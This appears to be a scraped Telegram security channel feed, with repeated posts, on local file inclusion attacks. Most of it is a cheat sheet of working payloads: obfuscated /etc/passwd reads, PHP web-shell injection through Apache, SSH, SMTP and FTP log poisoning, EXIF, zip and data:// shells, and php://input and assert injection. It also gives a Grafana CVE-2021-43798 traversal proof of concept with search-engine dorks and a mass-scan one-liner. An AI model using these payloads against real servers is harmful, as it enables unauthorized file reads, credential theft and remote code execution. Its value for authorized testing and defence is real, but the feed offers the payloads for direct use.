LFI Bypass
#bugbounty #bugbountytips #lfi
1) /usr/bin/cat /etc/passwd == /???/???/c?t$IFS/?t?/p?s?wd
2) /*/?at$IFS/???/???swd
3)/****/?at$IFS/???/*swd
4)/****/?at$IFS/???/*******swd
(IFS is Internal Field Separator = [space], [tab] or a [newline])#bugbounty #bugbountytips #lfi
Achieving LFI to RCE
1. Apache Log Poisoning
Read source code, it may contain sensitive data (username/passwords, private keys etc)->RCE
7. Zip upload
Include shell in headers (User-Agent, Authorisation, Referrer etc) and access /proc/self/fd/{id}
10. expect://
Vulnerable Code: assert("strpos('$file', '..') === false") or die("Hacker!");
Payload: ' and die(system("whoami")) or '
13. Log files
14. Via PHP sessions
https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/
15. Via SSH
If ssh is active check which user is being used (/proc/self/status & /etc/passwd) and try to access <HOME>/.ssh/id_rsa
16. vsftpd Log Poisoning
Try to login (ftp) with the PHP payload in the username and access /var/log/vsftpd.log
17. Automation
https://github.com/D35m0nd142/LFISuite
#lfi #rce #cheatsheet
1. Apache Log Poisoning
GET /show.php?file=/var/log/apache2/access.log&c=ls HTTP/1.1
User-Agent: <?php system($_GET['c'])?>
2. SSH Log Poisoningssh '<?php system($_GET['c'])?>'@target.com
/show.php?file=/var/log/auth.log&c=ls
3. SMTP Log Poisoningtelnet target(.)com 25
MAIL FROM:<test@example.com>
RCPT TO:<?php system($_GET['c'])?>
/show.php?file=/var/log/mail.log&c=ls
4. Image Uploadexiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg
/show.php?file=../img.jpg&c=ls
5. /proc/self/environGET /show.php?file=../../proc/self/environ&c=ls HTTP/1.1
User-Agent: <?php system($_GET['c'])?>
6. php://filterRead source code, it may contain sensitive data (username/passwords, private keys etc)->RCE
php://filter/convert.base64-encode/resource=index.php
php://filter/read=string.rot13/resource=index.php
"php://filter" is case insensitive. Try URL/Double encoding7. Zip upload
echo "<?php system($_GET['c'])?>" > shell.php
zip shell(.)zip shell.php
mv shell(.)zip shell.jpg
rm shell.php
/show.php?file=zip://shell.jpg%23shell.php
8. data://text/plain/show.php?file=data://text/plain,<?php echo base64_encode(file_get_contents("index.php"))?>
/show.php?file=data://text/plain,<?php phpinfo()?>
/show.php?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pO2VjaG8gJ3NoZWxsISc7Pz4=
9. /proc/self/fd/{id}Include shell in headers (User-Agent, Authorisation, Referrer etc) and access /proc/self/fd/{id}
10. expect://
/show.php?page=expect://ls
11. input://POST /index.php?page=php://input HTTP/1.1
<?php system('ls')?>
12. RCE via vulnerable assert statementVulnerable Code: assert("strpos('$file', '..') === false") or die("Hacker!");
Payload: ' and die(system("whoami")) or '
13. Log files
/var/log/apache/{access.log or error.log}
/var/log/apache2/error.log
/usr/local/{apache or apache2}/log/error_log
/var/log/nginx/{access.log or error.log}
/var/log/httpd/error_log
Insert payload via headers (User-Agent, Authorisation, Referrer etc)14. Via PHP sessions
https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/
15. Via SSH
If ssh is active check which user is being used (/proc/self/status & /etc/passwd) and try to access <HOME>/.ssh/id_rsa
16. vsftpd Log Poisoning
Try to login (ftp) with the PHP payload in the username and access /var/log/vsftpd.log
17. Automation
https://github.com/D35m0nd142/LFISuite
#lfi #rce #cheatsheet
👍1
Grafana — Unauthorized Arbitrary Read File
The latest Grafana unpatched 0Day LFI is now being actively exploited, it affects only Grafana 8.0+
Dorks:
Shodan:
Fofa.so:
ZoomEye:
PoC
The "plugin-id" could be any plugin that exists in the system
One line command to detect:
#grafana #lfi #bugbounty #pentest
The latest Grafana unpatched 0Day LFI is now being actively exploited, it affects only Grafana 8.0+
Dorks:
Shodan:
title:"Grafana"Fofa.so:
app="Grafana"ZoomEye:
grafanaPoC
http://example.com/public/plugins/grafana-clock-panel/../../../../../../../etc/grafana/grafana.iniThe "plugin-id" could be any plugin that exists in the system
One line command to detect:
echo 'app="Grafana"' | fofa -fs 1000 | httpx -status-code -path "/public/plugins/graph/../../../../../../../../etc/passwd -mc 200 -ms 'root:x:0:0'#grafana #lfi #bugbounty #pentest
APT
Grafana — Unauthorized Arbitrary Read File The latest Grafana unpatched 0Day LFI is now being actively exploited, it affects only Grafana 8.0+ Dorks: Shodan: title:"Grafana" Fofa.so: app="Grafana" ZoomEye: grafana PoC http://example.com/public/plugins/grafana…
A (not so deep) Dive into Grafana CVE-2021-43798
This post will cover some details behind the recent Grafana vulnerability (CVE-2021-43798), which is a directory traversal bug allowing unauthenticated attackers to read files on the target server filesystem. This post will also discuss some real world scenario and attack surface of the Grafana.
https://nusgreyhats.org/posts/writeups/a-not-so-deep-dive-in-to-grafana-cve-2021-43798/
#grafana #lfi #cve
This post will cover some details behind the recent Grafana vulnerability (CVE-2021-43798), which is a directory traversal bug allowing unauthenticated attackers to read files on the target server filesystem. This post will also discuss some real world scenario and attack surface of the Grafana.
https://nusgreyhats.org/posts/writeups/a-not-so-deep-dive-in-to-grafana-cve-2021-43798/
#grafana #lfi #cve
NUS Greyhats
A (not so deep) Dive into Grafana CVE-2021-43798
Tired of log4shell? take some rest then
PHP LFI with Nginx Assistance
This post presents a new method to exploit local file inclusion (LFI) vulnerabilities in utmost generality, assuming only that PHP is running in combination with Nginx under a common standard configuration.
https://bierbaumer.net/security/php-lfi-with-nginx-assistance/
#lfi #nginx #php
This post presents a new method to exploit local file inclusion (LFI) vulnerabilities in utmost generality, assuming only that PHP is running in combination with Nginx under a common standard configuration.
https://bierbaumer.net/security/php-lfi-with-nginx-assistance/
#lfi #nginx #php
This media is not supported in your browser
VIEW IN TELEGRAM
LFIDump
A simple python script to dump remote files through a local file read or local file inclusion web vulnerability.
https://github.com/p0dalirius/LFIDump
#lfi #dump #tools #bugbounty
A simple python script to dump remote files through a local file read or local file inclusion web vulnerability.
https://github.com/p0dalirius/LFIDump
#lfi #dump #tools #bugbounty
❤1